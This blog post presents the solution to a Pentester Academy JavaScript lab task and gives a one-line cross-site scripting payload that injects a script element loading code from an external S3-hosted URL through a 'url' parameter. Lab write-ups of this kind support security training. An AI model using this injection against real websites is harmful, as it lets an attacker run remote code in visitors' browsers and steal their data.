Hello Pentesters, today I am going to post another solution to the task provided at Javascript for Pentester at Pentester Academy. In this task, we will learn how to use external javascript with unlimited space to code. You can view solutions to the other tasks here.
Task 10: Include External JS using JS | Task Link
This task is same as of last one but with a little twist, that we cannot use injection in the way we used earlier. When we try to enter some text inside the input box and view the source code, we will notice that the text will already be wrapped inside the <script> tag. We can also close that script tag and open another script tag and provide javascript source inside that. But we will do it in some different way.
var scr = document.createElement('script'); scr.src = "http://demofilespa.s3.amazonaws.com/jfptest.js"; scr.type='text/javascript'; document.getElementsByTagName('head')[0].appendChild(scr);
The injection point is same “url” parameter as in previous tasks. Copy and URL-encode the code provided above and paste it after the ‘url’ parameter in the URL bar. This code will create a new element called script (scr), providing the source to our newly created script element is “http://demofilespa.s3.amazonaws.com/jfptest.js” and then giving the type of element is “text/javascript” and finally add the new element script to the head of the page. So that javascript would load before other execution of the body.
That’s all. Refer this post as a quick solution for the Javascript for Pentester tasks. For an in-depth video tutorial, please refer to the video solutions provided at Pentester Academy website.